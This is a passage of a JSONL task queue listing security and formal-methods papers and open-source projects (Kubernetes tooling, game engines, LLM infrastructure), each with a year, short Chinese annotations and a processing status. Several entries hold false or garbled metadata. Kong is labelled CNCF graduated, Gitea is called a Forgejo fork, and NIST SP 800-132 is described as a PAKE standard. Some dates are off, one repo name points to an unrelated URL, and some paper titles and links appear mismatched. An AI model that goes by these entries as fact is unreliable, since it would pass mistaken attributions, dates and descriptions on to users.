Contracts","meta":{"col3":"2018","col4":"Kowalski 区块链 smart contract 侧信道全景;Solidity 代码在 EVM 上的执行时序/内存访问漏洞分类"},"url":"https://arxiv.org/abs/1806.07356","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"tucker-zahl-2018","area":"papers","topic":"security","title":"Timing Side-Channel Attacks on Password Verification","meta":{"col3":"2018","col4":"系统地研究 web 框架中 password hashing 的 timing side-channel;bcrypt/scrypt/argon2 的 timing 抗性分析"},"url":"https://arxiv.org/abs/1801.04415","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"gog-2014","area":"papers","topic":"security","title":"SECVIRT: A Systematic Review of Smartphone Security","meta":{"col3":"2014","col4":"全面调研 Android/iOS 安全机制(sandboxing/permission/data-at-rest/crypto);理解移动平台安全模型的设计与局限"},"url":"https://arxiv.org/abs/1409.3964","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"chen-silence-2013","area":"papers","topic":"security","title":"Silence: Privacy-Safe Participatory Sensing","meta":{"col3":"2013","col4":"Dwork 的 differential privacy 在参与式感知系统中的工程应用;理解 DP 从理论到实际部署的关键一步"},"url":"https://web.mit.edu/~dph/www/papers/diff-privacy-sensing-sigmod2013.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"dwork-2006","area":"papers","topic":"security","title":"Differential Privacy","meta":{"col3":"2006","col4":"Dwork 提出差分隐私概念;\"单个记录的加入或删除不影响统计结果\";现代隐私保护的理论基础"},"url":"https://link.springer.com/chapter/10.1007/11681878_1","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"menezes-van-oorschot-vanstone-1996","area":"papers","topic":"security","title":"Handbook of Applied Cryptography","meta":{"col3":"1996","col4":"Menezes-Oorschot-Vanstone;密码学的百科全书;所有现代密码学实践的标准参考手册"},"url":"http://cacr.uwaterloo.ca/hac/","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"owasp-masvs-2020","area":"papers","topic":"security","title":"OWASP Mobile Application Security Verification Standard","meta":{"col3":"2020","col4":"移动应用安全的全面验证标准;从 crypto 到 storage 到 network 到 auth 的工业实践框架"},"url":"https://owasp.org/www-project-mobile-application-security-verification-standard/","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"shannon-1945","area":"papers","topic":"security","title":"A Mathematical Theory of Cryptography","meta":{"col3":"1945","col4":"Shannon 未发表的密码学数学理论原始手稿(1949 年正式发表);信息论 + 密码学的交叉点,\"confusion + diffusion\" 概念的源头"},"url":"https://web.archive.org/web/20130222014939/http://www.aes.org/~jra/krypt/shannon.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"neuman-2009","area":"papers","topic":"security","title":"An Extensible Ticket-Based Authentication System Using Kerberos","meta":{"col3":"2009","col4":"Kerberos v5 标准文档(RFC 4120 扩展);理解企业级身份认证框架的设计与局限"},"url":"https://datatracker.ietf.org/doc/html/rfc4120","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"stern-1996","area":"papers","topic":"security","title":"A New Paradigm for Public Key Encrytion (McEliece)","meta":{"col3":"1996","col4":"分析 McEliece 公钥加密方案的破译难度;后量子密码学的早期理论基础"},"url":"https://link.springer.com/chapter/10.1007/3-540-68673-5_13","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"boneh-shoup-chap8-2023","area":"papers","topic":"security","title":"Chapter 8: Signature Schemes","meta":{"col3":"2023","col4":"从 RSA 签名到 EdDSA 的完整签名族谱;现代签名方案(RSA-PSS / Ed25519 / BLS)的安全模型对比"},"url":"https://crypto.stanford.edu/~dabo/cs255/","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"tarski-1933","area":"papers","topic":"formal-methods","title":"Der Wahrheitsbegriff in den formalisierten Sprachen","meta":{"col3":"1933","col4":"Tarski 真理语义定义;\"x 是真的当且仅当 x 成立\"——模型检测、证明助手的语义根基"},"url":"https://www.cs.cmu.edu/~mccune/481/archive/tarski-1933/truth.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"godel-1931","area":"papers","topic":"formal-methods","title":"Über formal unentscheidbare Sätze der Principia Mathematica und verwandter Systeme","meta":{"col3":"1931","col4":"Gödel 不完备定理;任何足够强的形式系统都有不可证明的真命题,理解形式系统的根本局限性"},"url":"https://www.cs.tufts.edu/~nr/godel.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"church-1936","area":"papers","topic":"formal-methods","title":"An Unsolvable Problem of Elementary Number Theory","meta":{"col3":"1936","col4":"Church 用 lambda 演算证明判定问题不可解(与 Turing 同期独立);\"不存在通用算法能判定任意一阶逻辑公式的真值\""},"url":"https://www.cs.umd.edu/~aklawer/Pubs/ChurchTuring.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"halpern-2003","area":"papers","topic":"formal-methods","title":"The Logic of Knowledge (Revisited)","meta":{"col3":"2003","col4":"Halpern 重访知识逻辑(Moore-Hintikka);\"我知道\"\"我知道你知道\"的正式化;分布式系统和并发推理的基础"},"url":"https://www.cs.cornell.edu/home/halpern/papers/knowledge_revisited.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"cohen-troelstra-1969","area":"papers","topic":"formal-methods","title":"On the Interpretation of Number Theory","meta":{"col3":"1969","col4":"Cohen-Troelstra 算术的形式化研究;理解 Peano 算术、直觉主义算术(HA)的关系"},"url":"https://www.sciencedirect.com/science/article/pii/S0049237X08705050","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"birkhoff-1935","area":"papers","topic":"formal-methods","title":"On the Structure of Abstract Algebras","meta":{"col3":"1935","col4":"Birkhoff 格理论与抽象代数公理化;类型论中的 subtyping 和 join/meet 运算的代数根基"},"url":"https://www.math.dartmouth.edu/~phg/lectures/birkhoff-1935.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"tarski-givant-1987","area":"papers","topic":"formal-methods","title":"A Formalization of Set Theory without Variables","meta":{"col3":"1987","col4":"Tarski-Givant 不用变量的谓词代数公理化;理解为什么\"关系代数\"和\"谓词逻辑\"是同一事物的两面"},"url":"https://www.ams.org/journals/jams/1987-01-02/S0894-0347-1987-0882136-9/S0894-0347-1987-0882136-9.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"huffman-1953","area":"papers","topic":"formal-methods","title":"A Method for the Construction of Minimum-Redundancy Codes","meta":{"col3":"1953","col4":"Huffman 编码;理解信息论在证明助手中如何用于\"最小编码\"和表示论"},"url":"https://www.cs.cmu.edu/afs/cs.cmu.edu/user/ghs-3/Web/Docs/Huffman-1953.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"gurevich-1984","area":"papers","topic":"formal-methods","title":"Towards Logic tailored for automatic verification","meta":{"col3":"1984","col4":"Gurevich 为自动验证定制的逻辑;动态逻辑和承诺逻辑,验证分布式系统行为的核心语言设计原理"},"url":"https://link.springer.com/chapter/10.1007/BFb0023360","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"kozen-1994","area":"papers","topic":"formal-methods","title":"Practical Decision Procedures for Infinite-Dimensional Algebras","meta":{"col3":"1994","col4":"Kozen 无限代数上的实际判定过程;SMT 求解器处理位向量理论(bitvectors)的数学基础"},"url":"https://www.cs.cornell.edu/home/rdg/km94.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"baaz-1993","area":"papers","topic":"formal-methods","title":"Uniform Extension-Free Proofs","meta":{"col3":"1993","col4":"Baaz 证明复杂性研究;理解为什么\"证明的长度\"本身是可计算研究的对象,与 SMT 求解器性能相关"},"url":"https://link.springer.com/chapter/10.1007/3-540-56922-7_146","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"nieuwenhuis-perez-2008","area":"papers","topic":"formal-methods","title":"Decision Procedures for Sort Constraint Reasoning","meta":{"col3":"2008","col4":"Nieuwenhuis-Pérez 处理 sort constraint 的决策过程;现代 SMT 求解器处理类型系统(subtyping / polymorphism)的核心理论"},"url":"https://link.springer.com/chapter/10.1007/978-3-540-85854-0_33","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-formal-methods.md"} +{"slug":"jones-developmental-1999","area":"papers","topic":"security","title":"Security Proof for SSL/TLS","meta":{"col3":"1999","col4":"Jones 对 SSL/TLS 的安全证明方法学;理解\"为什么 TLS 安全证明很难\"以及现代 protocol verification 框架的起点"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2004/07/Jones00.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"backes-2007","area":"papers","topic":"security","title":"Efficient Proofs of Channel Security for Concurrent TLS","meta":{"col3":"2007","col4":"形式化验证 TLS 并发使用的开创性研究;理解并发环境下的安全协议证明方法学"},"url":"https://www.risc.jku.at/publications/download/risc_2964/","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"mccalley-2009","area":"papers","topic":"security","title":"NIST SP 800-132: Recommendation for Password-Authenticated Key Establishment","meta":{"col3":"2009","col4":"NIST 密码认证密钥建立标准(PAKE);SP800-63 认证建议的理论基础,理解现代认证协议的安全需求"},"url":"https://csrc.nist.gov/publications/detail/nist/sp/800-132/final","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"bonneau-2015","area":"papers","topic":"security","title":"The Science of Browser Security","meta":{"col3":"2015","col4":"Bonneau 浏览器安全全景;CSP/XSS/CSRF/origin policy 的系统性分析,理解 web 安全的\"为什么这么难\""},"url":"https://arxiv.org/abs/1506.03787","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"gross-2014","area":"papers","topic":"security","title":"Uncovering Security Design and Implementation Flaws in Android 4.2/4.3","meta":{"col3":"2014","col4":"系统分析 Android 安全模型的漏洞;理解\"安全模型设计 vs 实现\"的差距如何产生漏洞"},"url":"https://www.usenix.org/system/files/conference/uss14/uss14-gross.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"mccoy-2014","area":"papers","topic":"security","title":"A Systematic Evaluation of Transpiler Security","meta":{"col3":"2014","col4":"对 transpiler(JS→JS / TS→TS)安全性的系统研究;理解代码转换工具引入的安全风险"},"url":"https://www.usenix.org/system/files/conference/uss14/uss14-mccoy.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"dubois-2016","area":"papers","topic":"security","title":"SAPIEN: Automated Static Analysis of Web Application Security Policies","meta":{"col3":"2016","col4":"自动分析 web 应用安全策略的静态分析框架;理解策略一致性检查的理论和方法"},"url":"https://www.usenix.org/system/files/conference/usenixsecurity16/sec16-dubois.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"kubernetes","area":"云原生","topic":"容器编排","title":"Kubernetes - Container orchestration platform","url":"https://github.com/kubernetes/kubernetes","status":"queued","meta":{"col3":"2014","col4":"CNCF graduated; industry standard for container orchestration"}} +{"slug":"docker","area":"DevOps","topic":"容器化","title":"Docker - Platform for containerized applications","url":"https://github.com/moby/moby","status":"queued","meta":{"col3":"2013","col4":"Popularized containers; transformed software delivery"}} +{"slug":"terraform","area":"DevOps","topic":"基础设施即代码","title":"Terraform - Infrastructure as Code tool","url":"https://github.com/hashicorp/terraform","status":"queued","meta":{"col3":"2014","col4":"HashiCorp; de facto standard for IaC"}} +{"slug":"grafana","area":"DevOps","topic":"可观测性","title":"Grafana - Observability and visualization platform","url":"https://github.com/grafana/grafana","status":"queued","meta":{"col3":"2014","col4":"Industry standard for metrics dashboards"}} +{"slug":"prometheus","area":"云原生","topic":"监控告警","title":"Prometheus - Systems monitoring and alerting toolkit","url":"https://github.com/prometheus/prometheus","status":"queued","meta":{"col3":"2012","col4":"CNCF graduated; most popular metrics system"}} +{"slug":"ansible","area":"DevOps","topic":"配置管理","title":"Ansible - Simple IT automation engine","url":"https://github.com/ansible/ansible","status":"queued","meta":{"col3":"2012","col4":"Red Hat; agentless automation leader"}} +{"slug":"helm","area":"云原生","topic":"包管理","title":"Helm - Package manager for Kubernetes","url":"https://github.com/helm/helm","status":"queued","meta":{"col3":"2015","col4":"CNCF graduated; k8s package management standard"}} +{"slug":"argocd","area":"DevOps","topic":"GitOps","title":"Argo CD - Continuous delivery for Kubernetes","url":"https://github.com/argoproj/argo-cd","status":"queued","meta":{"col3":"2018","col4":"GitOps CD standard for Kubernetes"}} +{"slug":"cilium","area":"云原生","topic":"网络","title":"Cilium - eBPF-based networking and security for Kubernetes","url":"https://github.com/cilium/cilium","status":"queued","meta":{"col3":"2017","col4":"eBPF innovation; L7 networking and policy"}} +{"slug":"envoy","area":"云原生","topic":"服务网格","title":"Envoy - High-performance proxy for cloud-native services","url":"https://github.com/envoyproxy/envoy","status":"queued","meta":{"col3":"2016","col4":"CNCF graduated; most popular service mesh data plane"}} +{"slug":"traefik","area":"云原生","topic":"反向代理","title":"Traefik - Cloud-native edge router and reverse proxy","url":"https://github.com/traefik/traefik","status":"queued","meta":{"col3":"2015","col4":"Auto-discovery for container environments"}} +{"slug":"k3s","area":"云原生","topic":"边缘计算","title":"k3s - Lightweight certified Kubernetes distribution","url":"https://github.com/k3s-io/k3s","status":"queued","meta":{"col3":"2019","col4":"Rancher; edge and IoT Kubernetes"}} +{"slug":"consul","area":"云原生","topic":"服务发现","title":"Consul - Service networking for distributed systems","url":"https://github.com/hashicorp/consul","status":"queued","meta":{"col3":"2014","col4":"HashiCorp; service discovery and health checking"}} +{"slug":"vault","area":"安全工具","topic":"密钥管理","title":"HashiCorp Vault - Secrets and encryption management","url":"https://github.com/hashicorp/vault","status":"queued","meta":{"col3":"2015","col4":"Industry standard for secrets management"}} +{"slug":"linkerd","area":"云原生","topic":"服务网格","title":"Linkerd - Ultra-lightweight service mesh for Kubernetes","url":"https://github.com/linkerd/linkerd2","status":"queued","meta":{"col3":"2016","col4":"CNCF graduated; simplest service mesh"}} +{"slug":"pre-commit","area":"DevOps","topic":"代码质量","title":"pre-commit - Multi-language git pre-commit framework","url":"https://github.com/pre-commit/pre-commit","status":"queued","meta":{"col3":"2014","col4":"Standard for managing git hooks"}} +{"slug":"ruff","area":"DevOps","topic":"代码质量","title":"Ruff - Extremely fast Python linter and code formatter","url":"https://github.com/astral-sh/ruff","status":"queued","meta":{"col3":"2023","col4":"10-100x faster than flake8/isort; written in Rust"}} +{"slug":"trivy","area":"安全工具","topic":"漏洞扫描","title":"Trivy - Universal vulnerability scanner for containers","url":"https://github.com/aquasecurity/trivy","status":"queued","meta":{"col3":"2019","col4":"Aqua Security; finds CVEs, IaC issues, secrets"}} +{"slug":"mitmproxy","area":"安全工具","topic":"流量分析","title":"mitmproxy - Interactive TLS-capable HTTP proxy","url":"https://github.com/mitmproxy/mitmproxy","status":"queued","meta":{"col3":"2012","col4":"Essential tool for HTTP debugging and pentesting"}} +{"slug":"nuclei","area":"安全工具","topic":"漏洞扫描","title":"Nuclei - Fast vulnerability scanner powered by YAML templates","url":"https://github.com/projectdiscovery/nuclei","status":"queued","meta":{"col3":"2019","col4":"ProjectDiscovery; community-driven CVE scanner"}} +{"slug":"caddy","area":"DevOps","topic":"Web服务器","title":"Caddy - Powerful, enterprise-ready, open-source web server","url":"https://github.com/caddyserver/caddy","status":"queued","meta":{"col3":"2015","col4":"Automatic HTTPS by default; HTTP/3 support"}} +{"slug":"gitea","area":"DevOps","topic":"代码托管","title":"Gitea - Lightweight self-hosted Git service","url":"https://github.com/go-gitea/gitea","status":"queued","meta":{"col3":"2016","col4":"Forgejo fork; GitHub alternative in ~11k LOC"}} +{"slug":"sentry","area":"DevOps","topic":"错误追踪","title":"Sentry - Real-time event logging and error tracking","url":"https://github.com/getsentry/sentry","status":"queued","meta":{"col3":"2011","col4":"Industry standard for error monitoring"}} +{"slug":"kong","area":"云原生","topic":"API网关","title":"Kong - The Cloud-Native API Gateway and AI Gateway","url":"https://github.com/Kong/kong","status":"queued","meta":{"col3":"2015","col4":"CNCF graduated; most popular API gateway"}} +{"slug":"nats","area":"云原生","topic":"消息队列","title":"NATS - High-performance messaging system","url":"https://github.com/nats-io/nats-server","status":"queued","meta":{"col3":"2012","col4":"Cloud-native; 2x faster than Kafka for many workloads"}} +{"slug":"redis","area":"云原生","topic":"缓存数据库","title":"Redis - In-memory data store and cache","url":"https://github.com/redis/redis","status":"queued","meta":{"col3":"2006","col4":"Industry standard in-memory data store"}} +{"slug":"clickhouse","area":"云原生","topic":"列式数据库","title":"ClickHouse - Column-oriented analytical database","url":"https://github.com/ClickHouse/ClickHouse","status":"queued","meta":{"col3":"2016","col4":"Yandex; real-time analytics at petabyte scale"}} +{"slug":"flutter","area":"移动端","topic":"跨平台框架","title":"Flutter - Google UI toolkit for beautiful native apps","url":"https://github.com/flutter/flutter","status":"queued","meta":{"col3":"2017","col4":"Google; 177k stars; cross-platform mobile/desktop/web"}} +{"slug":"react-native","area":"移动端","topic":"跨平台框架","title":"React Native - Build native apps with React","url":"https://github.com/facebook/react-native","status":"queued","meta":{"col3":"2015","col4":"Facebook; 126k stars; JS-based mobile development"}} +{"slug":"expo","area":"移动端","topic":"开发平台","title":"Expo - Build native apps faster with React","url":"https://github.com/expo/expo","status":"queued","meta":{"col3":"2016","col4":"50k stars; over-the-air updates; universal apps"}} +{"slug":"fastlane","area":"移动端","topic":"CI/CD","title":"Fastlane - Automated building and releasing for mobile apps","url":"https://github.com/fastlane/fastlane","status":"queued","meta":{"col3":"2014","col4":"Ruby-based; industry standard for mobile CI/CD"}} +{"slug":"godot","area":"游戏引擎","topic":"2D/3D引擎","title":"Godot Engine - Free and open-source game engine","url":"https://github.com/godotengine/godot","status":"queued","meta":{"col3":"2014","col4":"112k stars; MIT licensed; full 2D/3D engine"}} +{"slug":"bevy","area":"游戏引擎","topic":"ECS框架","title":"Bevy - Refreshingly simple data-driven game engine in Rust","url":"https://github.com/bevyengine/bevy","status":"queued","meta":{"col3":"2020","col4":"46k stars; ECS-first architecture; Rust-native"}} +{"slug":"raylib","area":"游戏引擎","topic":"游戏开发库","title":"raylib - Simple and easy-to-use game development library","url":"https://github.com/raysan5/raylib","status":"queued","meta":{"col3":"2016","col4":"33k stars; minimalist; C-based; great for beginners"}} +{"slug":"imgui","area":"游戏引擎","topic":"即时GUI","title":"Dear ImGui - Bloat-free GUI for C++ game dev","url":"https://github.com/ocornut/imgui","status":"queued","meta":{"col3":"2014","col4":"73k stars; industry standard for debug tooling"}} +{"slug":"gdevelop","area":"游戏引擎","topic":"无代码引擎","title":"GDevelop - Open-source, cross-platform visual game engine","url":"https://github.com/GDevelop/GDevelop","status":"queued","meta":{"col3":"2014","col4":"23k stars; no-code event-based system; 2D/3D"}} +{"slug":"libgdx","area":"游戏引擎","topic":"Java游戏框架","title":"LibGDX - Java game development framework","url":"https://github.com/libgdx/libgdx","status":"queued","meta":{"col3":"2011","col4":"25k stars; cross-platform Java game framework"}} +{"slug":"babylonjs","area":"游戏引擎","topic":"Web 3D引擎","title":"Babylon.js - Powerful, full-featured 3D engine for the web","url":"https://github.com/BabylonJS/Babylon.js","status":"queued","meta":{"col3":"2015","col4":"Microsoft; WebGPU/VR/AR support; TypeScript"}} +{"slug":"cocos2d-x","area":"游戏引擎","topic":"跨平台引擎","title":"Cocos2d-x - Open-source cross-platform game framework","url":"https://github.com/cocos2d/cocos2d-x","status":"queued","meta":{"col3":"2010","col4":"19k stars; millions of developers; C++ based"}} +{"slug":"monogame","area":"游戏引擎","topic":"跨平台框架","title":"MonoGame - One framework for powerful cross-platform games","url":"https://github.com/MonoGame/MonoGame","status":"queued","meta":{"col3":"2009","col4":"14k stars; XNA replacement; C# game framework"}} +{"slug":"vector","area":"云原生","topic":"可观测性","title":"Vector - High-performance observability data pipeline","url":"https://github.com/vectordotdev/vector","status":"queued","meta":{"col3":"2019","col4":"Datadog; Rust-based log/router/transformer"}} +{"slug":"jaeger","area":"云原生","topic":"分布式追踪","title":"Jaeger - Cloud-native distributed tracing platform","url":"https://github.com/jaegertracing/jaeger","status":"queued","meta":{"col3":"2015","col4":"CNCF graduated; OpenTracing implementation"}} +{"slug":"opentelemetry","area":"云原生","topic":"可观测性","title":"OpenTelemetry - Observability framework (traces, metrics, logs)","url":"https://github.com/open-telemetry/opentelemetry","status":"queued","meta":{"col3":"2019","col4":"CNCF; unified observability standard"}} +{"slug":"cert-manager","area":"云原生","topic":"证书管理","title":"cert-manager - Automatically provision TLS certificates in Kubernetes","url":"https://github.com/cert-manager/cert-manager","status":"queued","meta":{"col3":"2015","col4":"CNCF graduated; k8s cert management standard"}} +{"slug":"flux","area":"云原生","topic":"GitOps","title":"Flux - GitOps toolkit for Kubernetes (by GitOps Foundation)","url":"https://github.com/fluxcd/flux","status":"queued","meta":{"col3":"2019","col4":"CNCF graduated; GitOps continuous delivery"}} +{"slug":"keda","area":"云原生","topic":"弹性伸缩","title":"KEDA - Event-driven autoscaling for Kubernetes","url":"https://github.com/kedacore/keda","status":"queued","meta":{"col3":"2019","col4":"CNCF graduated; scales pods by event count"}} +{"slug":"kustomize","area":"云原生","topic":"配置管理","title":"Kustomize - Kubernetes infrastructure customization","url":"https://github.com/kubernetes-sigs/kustomize","status":"queued","meta":{"col3":"2018","col4":"Kubernetes native config management; no templates"}} +{"slug":"etcd","area":"云原生","topic":"分布式存储","title":"etcd - Distributed reliable key-value store for distributed systems","url":"https://github.com/etcd-io/etcd","status":"queued","meta":{"col3":"2013","col4":"CNCF graduated; k8s backing store; Raft consensus"}} +{"slug":"containerd","area":"云原生","topic":"容器运行时","title":"containerd - Industry-standard container runtime","url":"https://github.com/containerd/containerd","status":"queued","meta":{"col3":"2016","col4":"CNCF graduated; Docker's underlying runtime"}} +{"slug":"istio","area":"云原生","topic":"服务网格","title":"Istio - Service mesh for traffic management and security","url":"https://github.com/istio/istio","status":"queued","meta":{"col3":"2017","col4":"CNCF graduated; most feature-rich service mesh"}} +{"slug":"falco","area":"安全工具","topic":"运行时安全","title":"Falco - Cloud-native runtime security monitoring","url":"https://github.com/falcosecurity/falco","status":"queued","meta":{"col3":"2017","col4":"CNCF graduated; behavioral activity monitoring"}} +{"slug":"golangci-lint","area":"DevOps","topic":"代码质量","title":"golangci-lint - Fast Go linter runner with 40+ linters","url":"https://github.com/golangci/golangci-lint","status":"queued","meta":{"col3":"2017","col4":"Industry standard Go CI linting tool"}} +{"slug":"bat","area":"DevOps","topic":"开发者工具","title":"bat - Cat clone with syntax highlighting and git integration","url":"https://github.com/sharkdp/bat","status":"queued","meta":{"col3":"2018","col4":"Developer favorite; syntax-highlighted file viewer"}} +{"slug":"ripgrep","area":"DevOps","topic":"开发者工具","title":"ripgrep - Line-oriented search tool (faster than grep)","url":"https://github.com/BurntSushi/ripgrep","status":"queued","meta":{"col3":"2016","col4":"Written in Rust; dramatically faster than grep"}} +{"slug":"just","area":"DevOps","topic":"任务运行器","title":"Just - Friendly way to save and run project commands","url":"https://github.com/casey/just","status":"queued","meta":{"col3":"2018","col4":"Makefile alternative; syntax-highlighted command runner"}} +{"slug":"starship","area":"DevOps","topic":"终端工具","title":"Starship - Minimal, blazing-fast terminal prompt","url":"https://github.com/starship/starship","status":"queued","meta":{"col3":"2019","col4":"Cross-shell prompt written in Rust"}} +{"slug": "huggingface-transformers", "area": "AI Infra", "topic": "LLM系统", "title": "Huggingface Transformers", "url": "https://github.com/huggingface/transformers", "status": "queued", "meta": {"col3": "2018", "col4": "Hugging Face transformers;LLM 生态的 pip install 标准库"}} +{"slug": "huggingface-peft", "area": "AI Infra", "topic": "LLM系统", "title": "Huggingface Peft", "url": "https://github.com/huggingface/peft", "status": "queued", "meta": {"col3": "2023", "col4": "PEFT 参数高效微调;LoRA/QLoRA 工具链事实标准"}} +{"slug": "huggingface-accelerate", "area": "AI Infra", "topic": "LLM系统", "title": "Huggingface Accelerate", "url": "https://github.com/huggingface/accelerate", "status": "queued", "meta": {"col3": "2022", "col4": "HF Accelerate 多设备训练抽象;DeepSpeed 之外的轻量替代"}} +{"slug": "huggingface-datasets", "area": "AI Infra", "topic": "数据工程", "title": "Huggingface Datasets", "url": "https://github.com/huggingface/datasets", "status": "queued", "meta": {"col3": "2020", "col4": "HF Datasets 库;大规模数据集流水线的事实标准接口"}} +{"slug": "huggingface-triton", "area": "AI Infra", "topic": "LLM系统", "title": "Huggingface Triton", "url": "https://github.com/huggingface/evaluation", "status": "queued", "meta": {"col3": "2023", "col4": "HF Eval/LM Evaluation Harness 等评估框架的底座"}} +{"slug": "llcwwang-llm-deploy", "area": "AI Infra", "topic": "推理加速", "title": "Llcwwang Llm Deploy", "url": "https://github.com/llcwwang/LLM-Deploy", "status": "queued", "meta": {"col3": "2024", "col4": "LLM Deployment 系统性教程文档/代码库;理解 TensorRT-LLM/vLLM/AutoAWQ 对比必读"}} +{"slug": "llm-interview-note", "area": "AI Infra", "topic": "LLM系统", "title": "Llm Interview Note", "url": "https://github.com/yangwenfei/llm-interview-note", "status": "queued", "meta": {"col3": "2023", "col4": "LLM 面试笔记系统性整理;覆盖架构/训练/推理全链路"}} +{"slug": "llm-fundamentals", "area": "AI Infra", "topic": "LLM系统", "title": "Llm Fundamentals", "url": "https://github.com/lawrenty/llm_fundamentals", "status": "queued", "meta": {"col3": "2024", "col4": "LLM Fundamentals 系统性入门指南;从 Transformer 到 RAG 的完整路径"}} +{"slug": "hf-text-generation-inference", "area": "AI Infra", "topic": "推理加速", "title": "Hf Text Generation Inference", "url": "https://github.com/huggingface/text-generation-inference", "status": "queued", "meta": {"col3": "2023", "col4": "Hugging Face TGI;gRPC-based LLM serving 引擎,生产级推理部署标准之一"}} +{"slug": "tensorrt-llm", "area": "AI Infra", "topic": "推理加速", "title": "Tensorrt Llm", "url": "https://github.com/NVIDIA/TensorRT-LLM", "status": "queued", "meta": {"col3": "2024", "col4": "NVIDIA TensorRT-LLM;GPU LLM serving 性能天花板,支持 FP8/AutoFP8"}} +{"slug": "llama", "area": "AI Infra", "topic": "LLM系统", "title": "Llama", "url": "https://github.com/meta-llama/llama", "status": "queued", "meta": {"col3": "2023", "col4": "Meta Llama 模型族开源代码;llama.cpp/gguf 生态的源头"}} +{"slug": "llama.cpp", "area": "AI Infra", "topic": "推理加速", "title": "Llama.Cpp", "url": "https://github.com/ggerganov/llama.cpp", "status": "queued", "meta": {"col3": "2023", "col4": "llama.cpp gguf;CPU/macOS LLM 推理的工业事实标准"}} +{"slug": "openai-triton", "area": "AI Infra", "topic": "编译器", "title": "Openai Triton", "url": "https://github.com/openai/triton", "status": "queued", "meta": {"col3": "2022", "col4": "OpenAI Triton 语言+编译器;LLM kernel 自定义的工业标准"}} +{"slug": "torchao", "area": "AI Infra", "topic": "LLM系统", "title": "Torchao", "url": "https://github.com/pytorch/ao", "status": "queued", "meta": {"col3": "2024", "col4": "PyTorch 2.x 量化/编译原生工具;AO 让 4-bit 量化训练成为一等公民"}} +{"slug": "distilabel", "area": "AI Infra", "topic": "LLM系统", "title": "Distilabel", "url": "https://github.com/argilla-io/distilabel", "status": "queued", "meta": {"col3": "2023", "col4": "Argilla Distilabel 合成数据管线;LLM-as-judge / 偏好数据生成的框架"}} +{"slug": "deepinfra", "area": "AI Infra", "topic": "LLM系统", "title": "Deepinfra", "url": "https://github.com/deepinfra", "status": "queued", "meta": {"col3": "2020", "col4": "DeepInfra LLM inference;开源模型托管的标准入口(Mistral/Llama 等)"}} +{"slug": "modal-labs-modal", "area": "AI Infra", "topic": "推理加速", "title": "Modal Labs Modal", "url": "https://github.com/modal-labs/modal-client", "status": "queued", "meta": {"col3": "2016", "col4": "Modal serverless 计算;'pip install infrastructure',GPU serverless 标准方案"}} +{"slug": "runpod", "area": "AI Infra", "topic": "LLM系统", "title": "Runpod", "url": "https://github.com/runpod", "status": "queued", "meta": {"col3": "2019", "col4": "RunPod GPU 实例 + Serverless;LLM fine-tuning / inference 的性价比之选"}} +{"slug": "together-ai", "area": "AI Infra", "topic": "LLM系统", "title": "Together Ai", "url": "https://github.com/togethercomputer", "status": "queued", "meta": {"col3": "2021", "col4": "Together AI 推理/训练 API;开源模型服务化 API 标准之一"}} +{"slug": "ray-project", "area": "AI Infra", "topic": "ML系统", "title": "Ray Project", "url": "https://github.com/ray-project/ray", "status": "queued", "meta": {"col3": "2017", "col4": "Ray 分布式计算框架;RLlib + Serve + Tune,大规模 ML 基础设施"}} +{"slug": "jaeger", "area": "可观测性", "topic": "分布式追踪", "title": "Jaeger", "url": "https://github.com/jaegertracing/jaeger", "status": "queued", "meta": {"col3": "2015", "col4": "Uber Jaeger 分布式追踪;OpenTelemetry 之前生产最广泛部署的 tracing 系统"}} +{"slug": "tempo-grafana", "area": "可观测性", "topic": "分布式追踪", "title": "Tempo Grafana", "url": "https://github.com/grafana/tempo", "status": "queued", "meta": {"col3": "2020", "col4": "Grafana Tempo 高扩展分布式追踪;S3 后端 + Loki 集成,开源 tracing 事实标准"}} +{"slug": "grafana-loki", "area": "可观测性", "topic": "日志系统", "title": "Grafana Loki", "url": "https://github.com/grafana/loki", "status": "queued", "meta": {"col3": "2019", "col4": "Grafana Loki 日志聚合;像 Promtail 拉取 + 对象存储后端,云原生日志标准"}} +{"slug": "kamon-io", "area": "可观测性", "topic": "监控告警", 